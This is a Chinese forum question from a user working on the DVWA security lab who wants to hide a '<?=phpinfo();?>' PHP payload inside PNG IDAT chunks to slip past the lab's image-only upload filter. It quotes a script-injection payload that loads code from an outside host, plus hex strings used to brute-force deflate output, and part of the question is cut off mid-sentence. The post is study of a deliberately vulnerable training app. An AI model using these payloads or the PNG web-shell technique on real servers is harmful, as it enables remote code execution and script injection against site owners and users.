【发布时间】:2018-03-07 05:31:40
【问题描述】:
我正在研究关于文件上传高漏洞的 DVWA。我想绕过过滤器,它只允许上传 jpg 或 png 等图像。所以我打算将有效载荷<?=phpinfo(); 嵌入到图像文件中。经过搜索,我发现了这些很棒的博客:
- An XSS on Facebook via PNGs & Wonky Content Types
- Encoding Web Shells in PNG IDAT chunks
- Revisiting XSS payloads in PNG IDAT chunks
我懒得研究 Deflate 算法和搜索 png shell 生成器,发现了这个很棒的存储库:
克隆并运行后,效果很好。但是有效载荷是针对 XSS Vuln output here:
<SCRIPT SRC=//ABC.DE></SCRIPT>
我想完成 DVWA 的目标。它说
由于此文件上传漏洞,在目标系统上执行您选择的任何 PHP 函数(例如 phpinfo() 或 system())。
所以,我想要的有效负载是:<?=phpinfo();?> 嵌入 PNG 的 IDAT 块中,该有效负载在 IDAT 上的过滤和压缩中幸存下来。从存储库中,我找到了 f1n1te / idontplaydarts 博客之前描述的 bruteforce() 逻辑。我复制源代码并尝试使用我的有效负载here 强制压缩压缩,但在符号字符上失败。基于源/生成器,我有 2 个问题:
- 为什么在the source 上,“
-
在我发现的 3 个博客和 1 个存储库中,它们使用此有效负载来暴力破解 Deflate:
7ff399281922111510691928276e6e5c1e151e51241f576e69b16375535b6f- f1n1tef399281922111510691928276e6e562e2c1e581b1f576e69b16375535b6f0e7f- 亚当03a39f67546f2c24152b116712546f112e29152b2167226b6f5f5310- idontplaydarts0000f399281922111510691928276e6e5313241e1f576e69b16375535b6f0000- 存储库
这些家伙是如何将所有这些有效载荷暴力破解的 Deflate Compression?
【问题讨论】:
-
你是如何获得代码第 17 行 $brute 变量之间的前缀和后缀的